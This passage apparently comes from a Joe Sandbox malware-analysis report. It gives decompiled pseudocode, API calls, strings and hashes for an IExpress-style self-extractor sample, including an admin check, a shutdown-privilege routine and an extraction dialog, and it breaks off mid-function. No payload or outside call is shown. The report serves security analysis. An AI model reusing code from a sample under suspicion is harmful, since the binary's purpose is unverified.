0x00385fb3
0x00000000
0x00385fb5
0x00385fb7
0x00000000
0x00385fb9
0x00000000
0x00385fb9
0x00385fb7
0x00385fb3
0x00385faf
0x00385f8d
0x00385f8d
0x00385f8d
0x00385f8f
0x00385fc1
0x00385fc1
0x00385fc1
0x00000000
0x00385e74
0x00385e74
0x00385e77
0x00385ea0
0x00385ebd
0x00385f79
0x00000000
0x00385f7f
0x00385ec3
0x00385ec3
0x00385ecc
0x00385ed4
0x00385ed6
0x00385edc
0x00385edf
0x00385eea
0x00385eed
0x00385f3f
0x00385f40
0x00000000
0x00385eef
0x00385eef
0x00385ef2
0x00385f34
0x00385ef4
0x00385ef4
0x00385ef7
0x00385f2b
0x00000000
0x00385ef9
0x00385ef9
0x00385efc
0x00385f22
0x00000000
0x00385efe
0x00385eff
0x00385f02
0x00385f16
0x00385f04
0x00385f07
0x00385f0d
0x00385f46
0x00385f46
0x00385f09
0x00385f09
0x00385f09
0x00385f07
0x00385f02
0x00385efc
0x00385ef7
0x00385ef2
0x00385f4c
0x00385f4e
0x00385f50
0x00385f54
0x00385ed4
0x00385ea2
0x00385ea4
0x00385eaf
0x00385eaf
0x00000000
0x00385e79
0x00385e7d
0x00000000
0x00385e83
0x00385e83
0x00385e83
0x00385e85
0x00385e85
0x00385e8e
0x00000000
0x00385e94
0x00000000
0x00385e94
0x00385e8e
0x00385e7d
0x00385e77
0x00385e6e
0x00385e65
0x00385e5c
0x00000000
0x00000000
0x00000000
0x00385dd0
0x00385dd0
0x00385dd0
0x00000000
0x00385dd0
0x00385dce
0x00385dca
0x00385dba
0x00000000
0x00385d00
0x00385dd9
0x00385e04
0x003861fe
0x00385e0a
0x00385e0c
0x00385e17
0x00385e17
0x00385e04
0x00386200
0x00386200
0x00000000

APIs

CharNextA.USER32(?,00000000,?,?), ref: 00385CEE
GetModuleFileNameA.KERNEL32(00388B3E,00000104,00000000,?,?), ref: 00385DFC
CharUpperA.USER32(?), ref: 00385E3E
CharUpperA.USER32(-00000052), ref: 00385EE1
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00385F6F
CharUpperA.USER32(?), ref: 00385FA7
CharUpperA.USER32(-0000004E), ref: 00386008
CharUpperA.USER32(?), ref: 003860AA
CloseHandle.KERNEL32(00000000,00381140,00000000,00000040,00000000), ref: 003861F1
ExitProcess.KERNEL32 ref: 003861F8

Strings

:, xrefs: 00386118
", xrefs: 0038612D
", xrefs: 00385D78
RegServer, xrefs: 00385F66

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: f1c8471403d8ac9f7f3a4d5bce7ce039fd6a6e24377544d3d8864dcc51419239
Instruction ID: eec8071ff4ff6981baa155919fda5349dc40132b107a206d7abdb08f24cbecbe
Opcode Fuzzy Hash: f1c8471403d8ac9f7f3a4d5bce7ce039fd6a6e24377544d3d8864dcc51419239
Instruction Fuzzy Hash: 43D17D71A08F449FDF37BB388C493FA7BA9AB55304F5500EAC486C6591D7748E868F41

Uniqueness

Uniqueness Score: -1.00%

Function 003818A3 Relevance: 16.6, APIs: 11, Instructions: 112
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E003818A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x388004; // 0xb25159a8
				_v8 = _t23 ^ _t53;
				_t25 =  *0x388128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00386CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E003817EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x388128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x388128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}

0x003818a3
0x003818a3
0x003818ab
0x003818b2
0x003818b5
0x003818be
0x003818c0
0x003818c6
0x003818c7
0x003818ca
0x003818cf
0x003819c9
0x003819d8
0x003819d8
0x003818df
0x003819b8
0x003819bd
0x003819bf
0x003819bf
0x00000000
0x003819bd
0x003818fa
0x00000000
0x00000000
0x00381912
0x003819aa
0x003819ad
0x003819b3
0x00000000
0x00381927
0x00381927
0x00381932
0x00381936
0x003819a9
0x003819a9
0x00000000
0x003819a9
0x0038194c
0x003819a2
0x003819a3
0x00000000
0x0038196e
0x00381970
0x00381999
0x0038199c
0x00000000
0x0038199c
0x00381972
0x00381972
0x00381975
0x00381984
0x00381985
0x0038198a
0x00000000
0x00000000
0x00000000
0x0038198c
0x00381991
0x00381996
0x00000000
0x00381996
0x0038194c

APIs

Part of subcall function 003817EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,003818DD), ref: 0038181A
Part of subcall function 003817EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0038182C
Part of subcall function 003817EE: AllocateAndInitializeSid.ADVAPI32(003818DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,003818DD), ref: 00381855
Part of subcall function 003817EE: FreeSid.ADVAPI32(?,?,?,?,003818DD), ref: 00381883
Part of subcall function 003817EE: FreeLibrary.KERNEL32(00000000,?,?,?,003818DD), ref: 0038188A

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 003818EB
OpenProcessToken.ADVAPI32(00000000), ref: 003818F2
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0038190A
GetLastError.KERNEL32 ref: 00381918
LocalAlloc.KERNEL32(00000000,?,?), ref: 0038192C
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00381944
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00381964
EqualSid.ADVAPI32(00000004,?), ref: 0038197A
FreeSid.ADVAPI32(?), ref: 0038199C
LocalFree.KERNEL32(00000000), ref: 003819A3
CloseHandle.KERNEL32(?), ref: 003819AD

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: 9cd19ceef79a2864ab2ba992eb591a835b6b6483a488b5435b0854d1f04784b7
Instruction ID: ed2dfa990ed05a68c2a42d74b5bd86e56082bb83e331f4306f3c07c0d6d226e6
Opcode Fuzzy Hash: 9cd19ceef79a2864ab2ba992eb591a835b6b6483a488b5435b0854d1f04784b7
Instruction Fuzzy Hash: 0E312FB1A00709EFEB22EFA5DC58AAFBBBCFF04750F2004A5E545D6150DB349906CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00381F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00381F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x389a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x388004; // 0xb25159a8
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E003844B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00386CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E003844B9(0, 0x522, 0x381140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00381EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

0x00381f90
0x00381f90
0x00381f93
0x00381f98
0x00381fa4
0x00381fa7
0x00381fc5
0x00381fcd
0x00381fdb
0x00381ee5
0x00381eea
0x00381ef1
0x00381ef4
0x00381f0c
0x00381f2e
0x00381f3a
0x00381f46
0x00381f4d
0x00381f58
0x00381f60
0x00381f61
0x00381f62
0x00381f75
0x00381f80
0x00381f77
0x00381f77
0x00000000
0x00381f77
0x00381f64
0x00381f64
0x00000000
0x00381f64
0x00381f0e
0x00381f0e
0x00381f13
0x00381f13
0x00381f14
0x00381f14
0x00381f16
0x00381f17
0x00381f1a
0x00381f1f
0x00381f1f
0x00381f86
0x00381f8f
0x00381fcf
0x00381fd3
0x00000000
0x00381fd3
0x00381fa9
0x00381fb4
0x00381fbb
0x00381fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x00381fc3
0x00381f9a
0x00381f9a
0x00381fa2
0x00381fd9
0x00381fda
0x00000000
0x00000000
0x00000000
0x00381fa2

APIs

GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00381EFB
OpenProcessToken.ADVAPI32(00000000), ref: 00381F02
ExitWindowsEx.USER32(00000002,00000000), ref: 00381FD3

Strings

SeShutdownPrivilege, xrefs: 00381F28

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: 0d1e9b811a048f009c6e3fd03a7d28b82b4efd32cd4d2709414d290191be21c3
Instruction ID: 6911c522ce78e9c2611a32671d7390e00fe95785a19291c8d0339a94cf3aba4b
Opcode Fuzzy Hash: 0d1e9b811a048f009c6e3fd03a7d28b82b4efd32cd4d2709414d290191be21c3
Instruction Fuzzy Hash: 1B21B7B1A40305ABEB227BA19C4EFBF77BCEB85B10F210199FB06D6581D77488429761

Uniqueness

Uniqueness Score: -1.00%

Function 00386CF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00386CF0(char _a4) {

				SetUnhandledExceptionFilter(0);
				_t1 =  &_a4; // 0x386e26
				UnhandledExceptionFilter( *_t1);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00386cf7
0x00386cfd
0x00386d00
0x00386d19

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00386E26,00381000), ref: 00386CF7
UnhandledExceptionFilter.KERNEL32(&n8,?,00386E26,00381000), ref: 00386D00
GetCurrentProcess.KERNEL32(C0000409,?,00386E26,00381000), ref: 00386D0B
TerminateProcess.KERNEL32(00000000,?,00386E26,00381000), ref: 00386D12

Strings

&n8, xrefs: 00386CFD

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID: &n8
API String ID: 3231755760-285023735
Opcode ID: 7f54443cd6878b48ee951c88c31d35fd809c6c4580c1409e4e7361de3308ca6f
Instruction ID: bf2def6ccfafa3e6cd43f21a727466722a237d106c5a742c8b892283a51a8520
Opcode Fuzzy Hash: 7f54443cd6878b48ee951c88c31d35fd809c6c4580c1409e4e7361de3308ca6f
Instruction Fuzzy Hash: 97D0C932004B08BBFB022BE1EC0CA593F2CEB48713F484082F31A82020CA3644518B52

Uniqueness

Uniqueness Score: -1.00%

Function 00387155 Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00387155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x388004; // 0xb25159a8
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x388004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x388004 = _t39;
				}
				_t37 =  !_t36;
				 *0x388008 = _t37;
				return _t37;
			}

0x0038715d
0x00387161
0x00387165
0x00387178
0x00387182
0x0038718e
0x00387197
0x003871a0
0x003871b1
0x003871b8
0x003871c4
0x003871c7
0x003871cb
0x003871d5
0x003871da
0x003871da
0x003871dc
0x003871dc
0x003871e2
0x003871e5
0x003871ee

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00387182
GetCurrentProcessId.KERNEL32 ref: 00387191
GetCurrentThreadId.KERNEL32 ref: 0038719A
GetTickCount.KERNEL32 ref: 003871A3
QueryPerformanceCounter.KERNEL32(?), ref: 003871B8

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 666d54305898af6488ee0ed310aaa4276504b1a780d75c96591379a4d2848d90
Instruction ID: 5ea3b1dd98b3562ac82045757a93c922616acfbe67aca3bba8d106096856bbbe
Opcode Fuzzy Hash: 666d54305898af6488ee0ed310aaa4276504b1a780d75c96591379a4d2848d90
Instruction Fuzzy Hash: E9111C71D05708EFDB11DFB8DA4CA9EBBF9EF48315FA14896D805E7214EB349A048B41

Uniqueness

Uniqueness Score: -1.00%

Function 00383210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00383210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E003843D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "lega");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x389a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x3891e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E003844B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x3891e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x3891e5 - 3;
						if(_t49 - 0x3891e5 < 3) {
							goto L32;
						}
						_t24 =  *0x3891e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x3891e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E0038658A(0x3891e4, 0x104, 0x381140);
								_t27 = E003858C8(0x3891e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x3891e4 - 0x5c;
									if( *0x3891e4 != 0x5c) {
										L30:
										_t30 = E0038597D(0x3891e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x3891e5 - 0x5c;
									if( *0x3891e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E003844B9(_t64, 0x54a, 0x3891e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x3891e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x3891e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x3891e4 - 0x5c;
						if( *0x3891e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x389124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x389a3c, 0x3e8, 0x388598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00384224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x3887a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E003844B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

0x0038321b
0x0038321e
0x00383221
0x0038343c
0x0038343e
0x0038343f
0x00383445
0x00383447
0x00000000
0x00383447
0x00383229
0x0038322a
0x0038322f
0x003833ec
0x003833f7
0x00383410
0x00383416
0x0038341d
0x0038342d
0x0038342d
0x00383438
0x00000000
0x00383438
0x00383237
0x00383243
0x00383243
0x00383246
0x003832ee
0x003832f4
0x003832f6
0x003833d4
0x003833d6
0x003833db
0x003833dc
0x003833de
0x003833df
0x00383370
0x00383372
0x00000000
0x00383372
0x003832fc
0x00383301
0x00383301
0x00383303
0x00383304
0x00383304
0x0038330a
0x0038330d
0x00000000
0x00000000
0x00383313
0x00383318
0x0038331a
0x00383331
0x00383332
0x0038333a
0x0038333d
0x0038337c
0x00383388
0x0038338f
0x00383394
0x00383396
0x003833a4
0x003833ab
0x003833b6
0x003833be
0x003833c3
0x003833c5
0x00383435
0x00383437
0x00383437
0x00000000
0x00383437
0x003833c7
0x003833c9
0x003833cc
0x00000000
0x003833cc
0x003833ad
0x003833b4
0x00000000
0x00000000
0x00000000
0x003833b4
0x00383398
0x00383399
0x0038339b
0x0038339c
0x0038339d
0x00000000
0x0038339d
0x0038334c
0x00383351
0x00383354
0x00000000
0x00000000
0x0038335c
0x00383362
0x00383364
0x00000000
0x00000000
0x00383366
0x00383367
0x00383369
0x0038336a
0x0038336b
0x00000000
0x0038336b
0x0038331c
0x00383323
0x00000000
0x00000000
0x00383329
0x0038332b
0x00000000
0x00000000
0x00000000
0x0038332b
0x0038324c
0x0038324c
0x0038324f
0x003832c8
0x003832ce
0x00000000
0x003832ce
0x00383251
0x00383256
0x00000000
0x00000000
0x00383271
0x00383277
0x00383279
0x00383298
0x0038329d
0x0038329f
0x00000000
0x00000000
0x003832b0
0x003832b6
0x003832b8
0x00000000
0x00000000
0x003832be
0x00383280
0x00383289
0x0038328e
0x00000000
0x0038328e
0x0038327b
0x00000000
0x0038327b
0x00000000

APIs

LoadStringA.USER32(000003E8,00388598,00000200), ref: 00383271
GetDesktopWindow.USER32 ref: 003833E2
SetWindowTextA.USER32(?,lega), ref: 003833F7
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00383410
GetDlgItem.USER32(?,00000836), ref: 00383426
EnableWindow.USER32(00000000), ref: 0038342D
EndDialog.USER32(?,00000000), ref: 0038343F

Strings

lega, xrefs: 003833F1
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 003832E2, 003832E7, 00383331, 00383344, 0038335B, 0038336A

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$lega
API String ID: 2418873061-2593092679
Opcode ID: dd129b9eb7d6c5b4ebd0b4706d832150806bb12a8c476ddd7508e4ad96814d67
Instruction ID: 702dc7079917931a76fb7d38754efaad58c41fb82cffb3ba01edce64d9d17b0d
Opcode Fuzzy Hash: dd129b9eb7d6c5b4ebd0b4706d832150806bb12a8c476ddd7508e4ad96814d67
Instruction Fuzzy Hash: D65125303413417BFB237B369C8CFBB2A5DDB86F54F5444E9F645976C0CAA88A029362

Uniqueness

Uniqueness Score: -1.00%

Function 00382CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00382CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x388004; // 0xb25159a8
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x389a3c = __ecx;
				memset(0x389140, 0, 0x8fc);
				memset(0x388a20, 0, 0x32c);
				memset(0x3888c0, 0, 0x104);
				 *0x3893ec = 1;
				_t20 = E0038468F("TITLE", 0x389154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x38858c = _t27;
					SetEvent(_t27);
					_t64 = 0x389a34;
					if(E0038468F("EXTRACTOPT", 0x389a34, 4) != 0) {
						if(( *0x389a34 & 0x000000c0) == 0) {
							L12:
							 *0x389120 =  *0x389120 & _t65;
							if(E00385C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x388a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x388184 != 0) {
										__imp__#17();
									}
									if( *0x388a24 == 0) {
										_t57 = _t65;
										if(E003836EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x389a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x389a34 & 0x00000100) == 0 || ( *0x388a38 & 0x00000001) != 0 || E003818A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00386517(_t57, 0x7d6, _t34, E003819E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00382390(0x388a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E003844B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E0038468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x388588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x389a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E003844B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
